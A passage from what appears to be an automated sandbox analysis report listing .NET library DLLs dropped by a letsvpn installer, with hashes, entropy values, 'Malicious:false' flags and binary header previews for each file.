                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@..P............... ....`......x'............................................... ............... ..H............text........ ...................... ..`.rsrc...P....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......l...#Strings....|.......#US.........#GUID...........#Blob......................3......................................................n.....B.....".....V.................U...........$.....m...........?.....(...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.!...C.<...K.\...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Tasks.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.878055743773289
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:y8MjKb47T3UCcqFMkJ59WdtW0hqWOHlLf2KQcvBZ98imTKS+ShjmM6IGBkSubu:/MjKb4vcGdObq3b2KZBZbCKS+ST6nk7S
                                                                                                                                                                                                  MD5:539E2BD6B494B24A740542D5848CEAD2
                                                                                                                                                                                                  SHA1:C9E763F47309E326958EDF77BCAF6A220B1E69B9
                                                                                                                                                                                                  SHA-256:34D54D62F359CAFFF810A522F654B02BF00C8EC5B0315D37C343673223272DED
                                                                                                                                                                                                  SHA-512:CEB43F8BD718ACACFD52B2BFE7DB3ED043E465E2133B0F86C7582C9FECDB58CD08ECBB1A1F4D975581227E235A785BD9C9F2309857C0C7F6588D3AC71E6E65AC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ..............................I.....@.................................`,..O....@.................. ....`......(+............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................,......H.......P ..X....................*......................................BSJB............v4.0.30319......l...<...#~..........#Strings....4.......#US.8.......#GUID...H.......#Blob......................3................................!.....O.......................................].....z.............................7.......j...........n...........................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Thread.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.969645890003852
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:LzyNXd4+BW6FWahqWOHlLf2KQcvBZ9nxdS+ShjmM6IGBkSE0:Czhq3b2KZBZxS+ST6nkA
                                                                                                                                                                                                  MD5:CF6552D68B6F1C55F3C689DD9C0EE2E6
                                                                                                                                                                                                  SHA1:37723E957F45EF8A943BAB49EDAA7EA4F18EEA23
                                                                                                                                                                                                  SHA-256:2CE7C251CE22D21A90E801EE0264778CD292A9271CF50B9FEB8F5762CCD4BF97
                                                                                                                                                                                                  SHA-512:50256B2D874FF70AEB52838EB64E7B8C7DBF3E2D5617EDF3E711648FB65C6E0234AA4660FBFC0AECF598F1E318B42CE57AB1141F1D2A7BC7312EEC52C452B9CF
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................(..O....@.................. ....`.......'............................................... ............... ..H............text... .... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P .......................'......................................BSJB............v4.0.30319......l.......#~..,...p...#Strings............#US.........#GUID...........#Blob......................3..................................................'.....'...T.....G.....h.................g...........6.................Q.....:...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.ThreadPool.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.96528000837832
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:Zvs2Q3HKJNrWWRWOhqWOHlLf2KQcvBZ93d6S+ShjmM6IGBkSzL:ZuM9q3b2KZBZv6S+ST6nkML
                                                                                                                                                                                                  MD5:1592C7E948FF7CDFE8D93D07B285AB46
                                                                                                                                                                                                  SHA1:84A0AFFB12888F576A8367AB3FFE3311CDC0E781
                                                                                                                                                                                                  SHA-256:D39637DA74B212D707EF62FFB5508AA03D33EACB3CE467519C018691178AE9BB
                                                                                                                                                                                                  SHA-512:EB71D470608717A1321CBDDA85484D091BE992FD23983BF2212CA2088FC613F8E13BFAB85F48C7FBA8199508F0E6F2446F6E414A8FDB9D7AB28E180C80FFC3F4
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ..............................u.....@..................................(..O....@..4............... ....`......h'............................................... ............... ..H............text........ ...................... ..`.rsrc...4....@......................@..@.reloc.......`......................@..B.................(......H.......P .......................&......................................BSJB............v4.0.30319......l.......#~......`...#Strings....p.......#US.t.......#GUID...........#Blob......................3................................................../...q./...E.....O.....Y.................X...........'.....p...........B.....+...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.8...K.X...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.Timer.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.93954537010736
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vFz0Q6gcqRhcsMWdMW3hqWOHlLf2KQcvBZ9viS+ShjmM6IGBkSPC:vFz1c67q3b2KZBZIS+ST6nkV
                                                                                                                                                                                                  MD5:15CDE5130A757AE138879A5B76880593
                                                                                                                                                                                                  SHA1:4B29C1BD9B3809A39607A3D972280DFE7CCD07A1
                                                                                                                                                                                                  SHA-256:3469C44E1E8480D20FECD1A45151BB9C7DE737B8F906F28D793838AA04200877
                                                                                                                                                                                                  SHA-512:A4DD3CA58859CFC9FD9690E3145297452EEED596FD7360EB2D863677598726427B7DC5C860EEF56BA8538A204A4C6ACCFDC9ABE8D1FD1323B766EB039FEE70A3
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............(... ...@....... ....................................@.................................L(..O....@.................. ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................(......H.......P ..D....................&......................................BSJB............v4.0.30319......l.......#~......,...#Strings.... .......#US.$.......#GUID...4.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Threading.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17952
                                                                                                                                                                                                  Entropy (8bit):6.837689115862053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:F6xWA3W4aW/NWChqWOHlLf2KQcvBZ96U9HS+ShjmM6IGBkSB:FaBRq3b2KZBZ9JS+ST6nkW
                                                                                                                                                                                                  MD5:22012E4D0DD60A9988E005A03199702F
                                                                                                                                                                                                  SHA1:1EAF9418A32EC551423F8B51946F74A3E1517252
                                                                                                                                                                                                  SHA-256:D3B318DFF6DA0D3646A56C124F1A81A3111CD12730356F8396888F2CF074D61F
                                                                                                                                                                                                  SHA-512:E7FC15AE7FE54013803B242C945D670596B412C98BC8FEFE000110176217B7D7523D5E2424093D138CBA04B7C0937A7E8CB54E963D66E1533283E10259F8D2DB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............,... ...@....... ...................................@..................................+..O....@.................. ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P .......................*......................................BSJB............v4.0.30319......l... ...#~..........#Strings............#US.........#GUID...........#Blob......................3......................................-.........O.k.....k.....X.....................1...........o.........................B...........9...........J.....J.....J...).J...1.J...9.J...A.J...I.J...Q.J...Y.J...a.J...i.J...q.J.......................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.ValueTuple.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):74784
                                                                                                                                                                                                  Entropy (8bit):5.993362873950785
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:r784YWau8lqubx6WxXLA+o2SLFyEdux136ytgHo0AuresehSAS3qKw/mg:r7NV8v36tI0XCKASM//
                                                                                                                                                                                                  MD5:B858455996C84CB4A2E23E77F5DD2052
                                                                                                                                                                                                  SHA1:E3C301E11B436F05BDD431515EA0AC4EE8F3E621
                                                                                                                                                                                                  SHA-256:56CA971A57FFE258049F47CF0C292BA33FC8206A2B6006391CA9C222BF959AF3
                                                                                                                                                                                                  SHA-512:7E54B175EB40304211EB9C0CAACF1CDF51C2679C940B33AF679165F3EAAA3B1531BC53F9F98FCD431E55DF0CCFE12C464DE0F3783AE13FBC6EF2AA4EC1294442
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....>.Z.........." ..0.................. ... ....... .......................`......]D....@.....................................O.... ..P............... ....@......x................................................ ............... ..H............text........ ...................... ..`.rsrc...P.... ......................@..@.reloc.......@......................@..B........................H......................................................................6..o.........*f..o...........o.........*...o...........o...........o.........*...o...........o ..........o!...........o"........*...o#..........o$..........o%...........o&...........o'........*....0..L.........o(..........o)..........o*...........o+...........o,...........o-........*.0..Y.........o...........o/..........o0...........o1...........o2...........o3...........o4.... ...*....0..k.........o5....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Web.Services.Description.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18976
                                                                                                                                                                                                  Entropy (8bit):6.822573815542487
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:vvx21MWeLqW5nhqWOHlLf2KQcvBZ9gnHWma4S+ShjmM6IGBkSk:vJ2Wthq3b2KZBZ94S+ST6nk3
                                                                                                                                                                                                  MD5:9016D24A15C0FCABCA9B195685D546D3
                                                                                                                                                                                                  SHA1:3F59CC68BDE25DB5B256DD72608E53F243003027
                                                                                                                                                                                                  SHA-256:C19FA40FC81ADD0E8FA598F03BDEC26B4DBEA3501DF5658E06927CDC6E15FA49
                                                                                                                                                                                                  SHA-512:621081DD9967702E4FE16BAD789DC3D5D3BD725E77C17AEA6BE56D0E4920E647C7D54DA8C1D1FEA56C051D03ECE545781BBD6B8F02473F34261981334D0CCBC2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s.~..........." ..0.............:1... ...@....... ....................................`..................................0..O....@.................. ....`......./..T............................................ ............... ..H............text...@.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................1......H.......P .. ...................p/......................................BSJB............v4.0.30319......l...h...#~..........#Strings............#US.........#GUID.......4...#Blob......................3................................F...............4.c.....c...o.<...............U...........m.......................T.............2.................6.....6.....6...).6...1.6...9.6...A.6...I.6...Q.6...Y.6...a.6...i.6...q.6.......................#.....+.*...+.F...+.\...3.r...;.....C.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Windows.Interactivity.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):51744
                                                                                                                                                                                                  Entropy (8bit):6.2708476869450225
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:o3wBccZdxuB8mQen6JxKjrlMZgR0Eot3qKY/mN:WcHmQPUktc/C
                                                                                                                                                                                                  MD5:9BD8BABD259D5301A0A1E5050A163BAE
                                                                                                                                                                                                  SHA1:38D666BB5268A260EA6AA38369FB82CC6029F9EA
                                                                                                                                                                                                  SHA-256:57D256764D6E780D505AFA63479A1C2A7A374079D0F93CC57C4967367585ACAE
                                                                                                                                                                                                  SHA-512:38F6FD5C2212C276D3C42C145012C4F3DBD95F7E93A817C8E988343B8B2CEF65A953529BE7313C38C1F0639C617B0E0D9D828B647E0DD0A35DCEF463096ACF4C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...du.K...........!..................... ........ ;. ....................................@.................................\...O....................... ............................................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......4O..X`..........xD......P ......................................{c...2......q..Z,.C.....3.n.Z..7....R.....T.{yF")i.$JMv...,a.....U...M:,...Z.Q:..c..N.{....<....h%.....:s..T...Z.gSI.....6.(.....{....*...0..&........(..............s....o.....s....}....*...0..K........(.....{....o........,3..+&..( .........{.....o!............*..X...(....2.*..0..L........{.....o"...,=(#...(..................($...o%.......(&...o%.....('...s(...z*.0...........o).......E............d

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.ReaderWriter.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.955210507891377
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:3r97WquWYhqWOHlLf2KQcvBZ9A9S+ShjmM6IGBkSiaj:3RJ4q3b2KZBZYS+ST6nk5e
                                                                                                                                                                                                  MD5:359E96F1E3D4CF1B45357D9C02ACCEB9
                                                                                                                                                                                                  SHA1:B30FB5FB93B571E01F207AA954CCEA96253C4653
                                                                                                                                                                                                  SHA-256:75DC6A7021B4E412B98664D1C5017F458607B84C81D0BAA08B76F6F2005AFAC1
                                                                                                                                                                                                  SHA-512:A765E663ED6BED9C1EC8D59CAEA541F4C6AD3FE262A008FEADD5011D90E5D7E4B26F60F3E4A9BE7B8B68C420713103ADDCBE8D0930A10E8CF262ED4C5B656ED8
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............+... ...@....... ..............................(.....@.................................\+..O....@.................. ....`......$*............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H.......P ..T....................)......................................BSJB............v4.0.30319......l.......#~..T.......#Strings....0.......#US.4.......#GUID...D.......#Blob......................3......................................z...........j.....j.....W...............B.....z.............................................................Q.....Q.....Q...).Q...1.Q...9.Q...A.Q...I.Q...Q.Q...Y.Q...a.Q...i.Q...q.Q.......................#.....+.....3.....;.....C.4...K.T...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XDocument.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.906430383476696
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:q16eWLDWZhqWOHlLf2KQcvBZ95BS+ShjmM6IGBkS2h:G6Lyq3b2KZBZ9S+ST6nkRh
                                                                                                                                                                                                  MD5:4A8B84A7EF10B13E81857BFB02708FC3
                                                                                                                                                                                                  SHA1:0E63EBD59F13A628584F2DA2D0DB501B23EF97D2
                                                                                                                                                                                                  SHA-256:048643B783A173AEF2AC52005CB27DC9F70AD38ECF6FABD8C1868317692CDE2D
                                                                                                                                                                                                  SHA-512:077EA9B6229F2809630135C624EB9CF303D5546A78C6A98111D3E3B8023EBCF5C559F05DEC196BA70004C26BBA826E417007ED368FE6845758210E440224C9FB
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............*... ...@....... ..............................}.....@.................................|*..O....@.................. ....`......D)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P ..t....................(......................................BSJB............v4.0.30319......l.......#~......8...#Strings....T.......#US.X.......#GUID...h.......#Blob......................3..................................................z.....z...u.g.................................>.....W.................r.....[...................a.....a.....a...).a...1.a...9.a...A.a...I.a...Q.a...Y.a...a.a...i.a...q.a.......................#.....+.....3.....;.....C.1...K.Q...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.XDocument.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):18464
                                                                                                                                                                                                  Entropy (8bit):6.896763555557214
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:O8G4YC2W+wW8WpwW1hqWOHlLf2KQcvBZ9PlfS+ShjmM6IGBkSvacr:BGZ5lq3b2KZBZbS+ST6nkyaS
                                                                                                                                                                                                  MD5:BE61E3A1BB22AB977E7DE6538695BEAA
                                                                                                                                                                                                  SHA1:5B9059D915EDDAD58A1054660AAF0A5CC238D65A
                                                                                                                                                                                                  SHA-256:42891D1D8BC5F5A30DB038BAD254938E660D57FA9AC0CB29ACF46B1E3B77AE3E
                                                                                                                                                                                                  SHA-512:D77E08BD7D639DFCE63528C855CA08B456A7180CFCB62E7D90131F9A65DBD24FB70853F05674FAF64E03FB2DB414C7F095AD83054D9E13BAE5021F7CEC21DF89
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......Z.........." ..0..............+... ...@....... ..............................R2....@.................................z+..O....@..x............... ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...x....@......................@..@.reloc.......`......................@..B.................+......H.......t ......................P*........................................s....*:.(......}....*2.{....(....*BSJB............v4.0.30319......l.......#~..0.......#Strings............#US.........#GUID...........#Blob...........WW.........3..............................................................L.........4.H...}.H...u.v...........;...........;...=.;.................../.%...........P.....m.....................................v...S.......v...d.v...........v...m...............

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XPath.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.998455717974313
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:H6ziqTEkGWvRWlhqWOHlLf2KQcvBZ9ypS+ShjmM6IGBkSN:HYT1Uq3b2KZBZqS+ST6nke
                                                                                                                                                                                                  MD5:4E6B8B111DEFA233D2371E499C205B11
                                                                                                                                                                                                  SHA1:83BA5DBBC30F3061DA4A5D8C48EB2600379DA7EF
                                                                                                                                                                                                  SHA-256:752FFB91E0F093EEDCC1FE30FDBDC8D638192D3ABD8A3593CA7E80DF5EACCD74
                                                                                                                                                                                                  SHA-512:1694C2E5C064F28D74CE3B4437F072FE856FD94C0FB2DBD5E5B084F3A50541A0B9C73B92EB8D0FB659019068B1E8D61B8907C537D4608EFD2F683087A8D862E5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...B..Y.........." ..0..............)... ...@....... ....................................@..................................)..O....@.................. ....`......d(............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................)......H.......P .......................'......................................BSJB............v4.0.30319......l...0...#~..........#Strings....x.......#US.|.......#GUID...........#Blob......................3................................................'...........~...................................G.....`.................{.....d...................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.-...K.M...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlDocument.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.914453258066552
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:PUv7c7iWNCWLhqWOHlLf2KQcvBZ91b/OS+ShjmM6IGBkSL:PM7c1Rq3b2KZBZ7OS+ST6nkg
                                                                                                                                                                                                  MD5:9D8D0EA2C78FD96A911BF3309BA106CA
                                                                                                                                                                                                  SHA1:77A5CF297E4A096E9D4D69397FD1CE740C983449
                                                                                                                                                                                                  SHA-256:1A1BCB4B7D3D9F6237BC0AD500F569C67A3814D752CAC05EA36D88DE364503F5
                                                                                                                                                                                                  SHA-512:1FC4B5A840C3550DCD9C164EC50229707B0C229573FFDE68B0C298F2F34D0F5567385FBA0C72BD062394F0E9B5B04D2DC2F75521B3FC14DD0A3D97F407428876
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............*... ...@....... ....................................@..................................*..O....@.................. ....`......`)............................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................*......H.......P .......................(......................................BSJB............v4.0.30319......l.......#~......l...#Strings....l.......#US.p.......#GUID...........#Blob......................3................................................4...........~.............H.....H.....H.....H...T.H...m.H.....H.....H.........d.H.................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.3...K.S...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\System.Xml.XmlSerializer.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):17440
                                                                                                                                                                                                  Entropy (8bit):6.960387412382897
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:bSWnRWNhqWOHlLf2KQcvBZ9w+Z1DcS+ShjmM6IGBkSZ:bzIq3b2KZBZNcS+ST6nkC
                                                                                                                                                                                                  MD5:C696F5E811F8F558D1B6330C03E8CC14
                                                                                                                                                                                                  SHA1:E54559000EBDEC51C7162C528487DA60B5AD3FEB
                                                                                                                                                                                                  SHA-256:373D38EA5B8D8A8D55390BB9813A7A72BF5B930A77319E1CA52A70ADC85CE25A
                                                                                                                                                                                                  SHA-512:DA33E7E6C193CA5689AFB28539671F9CE3B3C97A1227F8C3526A6A731CD0C6FBD700C90AA0A2DCF2BFD8263BF56BCEFB92F9238F98DBF38FD1206CEE04A559AE
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...C..Y.........." ..0..............+... ...@....... .............................. .....@.................................L+..O....@..$............... ....`.......*............................................... ............... ..H............text........ ...................... ..`.rsrc...$....@......................@..@.reloc.......`......................@..B.................+......H.......P ..D....................)......................................BSJB............v4.0.30319......l.......#~..........#Strings.... .......#US.$.......#GUID...4.......#Blob......................3..................................................k.....k...U.@.........i.....=.........................................&.....'...................:.....:.....:...).:...1.:...9.:...A.:...I.:...Q.:...Y.:...a.:...i.:...q.:.......................#.....+.....3.....;.....C.5...K.U...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.Messages.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):101920
                                                                                                                                                                                                  Entropy (8bit):4.745461540655048
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:iHmt9tmMLbLR6330XUb9GYQtq3b2KZBZmS+ST6nkM:i+d6336UbIL43qK4/mG
                                                                                                                                                                                                  MD5:F23E3999FCDB4144DAC81D4808D2B897
                                                                                                                                                                                                  SHA1:B6055D4DBC6EA3C380787BE1D76332A033F5CFA4
                                                                                                                                                                                                  SHA-256:94537ED511AB56D787064EFCA837CC05FB99B2192F127C35668061E4CD69A09A
                                                                                                                                                                                                  SHA-512:F2F4FADE96296AE065814FE80AF8FBE521E73C8AFC6986DA2EEC9A0FC35DD8704C13052DA7204110FD2F89EC746562C5EB7E752D5B238AEE21864601A9DF9659
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....\.........." ..0.............*.... ........... ....................................@.....................................O...................`.. ............................................................ ............... ..H............text...0.... ...................... ..`.rsrc..............................@..@.reloc...............^..............@..B........................H........(..."...........J..p... ........................................0.. .......s7......}........8...s....o...+*.0..'.......s9......}......}........:...s....o...+*..0.. .......s;......} .......<...s....o...+*.0..'.......s=......}!.....}".......>...s....o...+*..0.. .......s?......}#.......@...s....o...+*.0..'.......sA......}$.....}%.......B...s....o...+*..0.. .......sC......}&.......D...s....o...+*.0..'.......sE......}'.....}(.......F...s....o...+*R.(.....(......(...+*2.(.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\ToastNotifications.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):121376
                                                                                                                                                                                                  Entropy (8bit):5.089922899922607
                                                                                                                                                                                                  Encrypted:false
